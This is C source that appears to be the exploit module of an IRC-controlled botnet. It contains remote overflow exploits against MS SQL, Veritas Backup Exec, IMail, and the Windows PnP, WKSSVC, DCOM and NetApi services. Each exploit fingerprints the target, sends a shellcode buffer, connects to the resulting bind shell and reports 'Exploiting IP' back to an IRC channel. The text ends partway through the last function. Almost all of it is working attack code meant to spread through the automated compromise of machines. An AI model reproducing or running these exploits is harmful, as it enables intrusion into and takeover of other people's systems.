BOOL thcsql(char *target, void* conn,EXINFO exinfo) { IRC* irc=(IRC*)conn; unsigned int sock,rc; struct sockaddr_in sqludp; if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) return FALSE; sqludp.sin_family=AF_INET; sqludp.sin_addr.s_addr=finet_addr(exinfo.ip); sqludp.sin_port=fhtons(exinfo.port); if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR) { if(rc==0) { fsend(sock,badbuffer,sizeof(badbuffer)-1,0); Sleep(1000); if (ConnectShell(exinfo, 31337)) { exploit[exinfo.exploit].stats++; if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } } fshutdown(sock,1); fclosesocket(sock); return FALSE; }
bool veritasbackupserver(EXINFO exinfo) { SOCKET sock; if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false; SOCKADDR_IN sin; memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = fhtons((unsigned short)exinfo.port); sin.sin_addr.s_addr = finet_addr(exinfo.ip); char payload[800]; char v91sp0sp1[]="\xFF\x50\x11\x40"; char esisp0sp1[]="\xA1\xFF\x42\x01"; memcpy(&talk[37], &v91sp0sp1, 4); memcpy(&talk[72], &esisp0sp1, 4); //os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0"; strcpy(payload,veritassc); if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false; if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false; Sleep(10); for (int i=0; i < 7;i++) { if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false; Sleep(10); } Sleep(1000); fclosesocket(sock); ConnectShell(exinfo,101); return (AddEx(exinfo,true)); }
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
BOOL iMail( char *target, void* conn,EXINFO exinfo ) { IRC* irc=(IRC*)conn; char szBanner[512];//, szShellcode[512]; int iRemoteTarget; int ibindsize=405; SOCKET sSocket; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500); SOCKADDR_IN sinSockAddrIn; memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn)); sinSockAddrIn.sin_family = AF_INET; sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip); sinSockAddrIn.sin_port = fhtons(exinfo.port); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500); if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL))) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500); if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500); if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500); if (strstr(szBanner,"IMail 7.04")) iRemoteTarget = 0; else if (strstr(szBanner,"IMail 7.05")) iRemoteTarget = 1; else if (strstr(szBanner,"IMail 7.06")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.07")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.10")) iRemoteTarget = 3; else if (strstr(szBanner,"IMail 7.11")) iRemoteTarget = 4; else if (strstr(szBanner,"IMail 7.12")) iRemoteTarget = 5; else if (strstr(szBanner,"IMail 7.13")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.14")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.15")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 8.00")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.01")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.02")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.03")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.04")) iRemoteTarget = 8; else if (strstr(szBanner,"IMail 8.05")) iRemoteTarget = 9; else if (strstr(szBanner,"IMail 8.10")) iRemoteTarget = 10; else if (strstr(szBanner,"IMail 8.11")) iRemoteTarget = 12; else if (strstr(szBanner,"IMail 8.12")) iRemoteTarget = 13; else if (strstr(szBanner,"IMail 8.13")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.14")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.15")) iRemoteTarget = 15; else iRemoteTarget = -1; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500); memcpy(szImailPacket + 12, bindshell, ibindsize -1); if (iRemoteTarget == -1) return FALSE; if (pImailTargets[iRemoteTarget].iSEHAddress == 0) memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4); else if (pImailTargets[iRemoteTarget].iSEHAddress == 1) memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500); if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500); fclosesocket(sSocket); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); return FALSE; }
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn) BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn) { IRC* irc=(IRC*)conn; //irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); BOOL success=FALSE; int TargetOS; // char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ TargetOS = FpHost(exinfo.ip, FP_PORT5K); if(TargetOS != OS_WINXP) TargetOS = FpHost(exinfo.ip, FP_RPC); if(TargetOS != OS_WINXP) return FALSE; else success=TRUE; // irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // parameters pszTarget=exinfo.ip; // char URL[MAX_HOSTNAME]; // char fname[_MAX_FNAME]; // sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9); // _snprintf(URL,sizeof(URL), // "ftp://*****:*****@%s:%d/%s", // (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname); unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL); if (!iShellSize) return FALSE; // get shellcode //iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); //if( !iShellSize ) // return FALSE; // generate exploits buffer // ======================== ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded)); ZeroMemory(szExploitsData, sizeof(szExploitsData)); ZeroMemory(wszExploitsData, sizeof(wszExploitsData)); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset(szExploitsData,'A',sizeof(szExploitsData)-1); // new EIP *(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); _snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget); mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t)); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { //_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget); _snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget); strncat(szIPC,"ipc$",sizeof(szIPC)); ZeroMemory(&NetSource,sizeof(NetSource)); NetSource.lpRemoteName = szIPC; fWNetAddConnection2(&NetSource,"","",0); } // =================== // connect to pipe // =============== //_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget); _snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget); strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe)); hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(hPipe == INVALID_HANDLE_VALUE) { fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE); return FALSE; } // =============== // bind packet // =========== ZeroMemory(&BindPacket,sizeof(BindPacket)); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof(BindPacket); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16); BindPacket.Interface2.version = 2; memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16); // send if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL)) { //irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle(hPipe); fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE); return FALSE; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while(nPacketSize % 4) nPacketSize++; if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { //irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } ZeroMemory(pPacket,nPacketSize); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) ZeroMemory(&pPacket[nPacketPos],8); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader)); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { //irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); if (success) { Sleep(5000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } return TRUE; }
BOOL scvx(char *target, void* conn,EXINFO exinfo) { IRC* irc=(IRC*)conn; SOCKET sockfd; // int gport; int len, len1, TargetOS; unsigned short port = 135; char *buf1="0x001"; char *buf2="0x001"; char lport[] = "\x00\xFF\xFF\x8b"; struct sockaddr_in their_addr; unsigned short tport; unsigned char *sc; TargetOS = FpHost(exinfo.ip, FP_SMB); if (TargetOS == OS_WIN2K3) { //type = 0; // gport=fhtons(bindport); // memcpy(&lport[1], &gport, 2); // *(long*)lport = *(long*)port^0x9432BF80; // memcpy(&sc[471],&lport,4); tport=fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&tport,2); sc=(unsigned char *)bindshell; // memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4); their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); their_addr.sin_port = fhtons(port); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR) return FALSE; len=strlen((const char*)sc); memcpy(buf2,fcr,sizeof(fcr)); len1=sizeof(fcr); *(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2; *(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2; memcpy(buf2+len1,mmps,sizeof(mmps)); len1=len1+sizeof(mmps); memcpy(buf2+len1,sc,strlen((const char*)sc)); len1=len1+strlen((const char*)sc); memcpy(buf2+len1,sc1,sizeof(sc1)); len1=len1+sizeof(sc1); memcpy(buf2+len1,svcd,sizeof(svcd)); len1=len1+sizeof(svcd); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; len=frecv(sockfd, buf1, 1000, 0); if (fsend(sockfd,buf2,len1,0)== -1) return FALSE; fclosesocket(sockfd); Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else { if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } } return TRUE; }
BOOL Exploit(EXINFO exinfo, SOCKET sockfd, int which) { int i, opt=0; char hostipc[40]; char hostipc2[40*2]; unsigned short port; unsigned char *sc; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(req4)+20]; char screq[BUFSIZE+sizeof(req7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; unsigned int targetnum=0; int len; char smblen; char unclen; sprintf((char *)hostipc,"\\\\%s\\ipc$", exinfo.ip); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, req4, sizeof(req4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); sc = (unsigned char *)bindshell; if (which != TARGET_XP) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttarget[which].jmpaddr, 4); memcpy(&buf[2036], sc, strlen((const char *)sc)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttarget[which].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], sc, strlen((const char*)sc)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, sc, strlen((const char*)sc)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttarget[which].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500); if (fsend(sockfd, req4u, smblen+4, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0); if (fsend(sockfd, req5, sizeof(req5)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0); if (fsend(sockfd, req6, sizeof(req6)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0); if (which != TARGET_XP) { memcpy(screq2k, req8, sizeof(req8)-1); memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, req9, sizeof(req9)-1); memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)-1); if (fsend(sockfd, screq2k, 4348, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0); if (fsend(sockfd, screq2k2, 4060, 0) == -1) return FALSE; } else { memcpy(screq, req7, sizeof(req7)-1); memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16); screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0; if (fsend(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1) return FALSE; } Sleep(3000); if (ConnectShell(exinfo,bindport)) return TRUE; return FALSE; }
BOOL exnetapi (EXINFO exinfo, int nTarget) { char szIPC[ 8192 ]; NETRESOURCE NetSource; DWORD nNullSessionError; char szPipe[ 8192 ]; HANDLE hPipe; RPC_ReqBind BindPacket; DWORD nBytesWritten; DWORD nBytesRead; unsigned char RecvBuff[ 8192 ]; NetrPathCanonicalize_Start PStart; NetrPathCanonicalize_End PEnd; size_t nPathLen; size_t nBufferPos; unsigned char *pPath; size_t nPacketSize; unsigned char *pPacket; RPC_ReqNorm ReqNormalHeader; bool bExit; int nCount; OVERLAPPED ov; if( _stricmp( exinfo.ip, "." ) ) { _snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 ); } _snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip ); hPipe = CreateFile( szPipe, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL ); 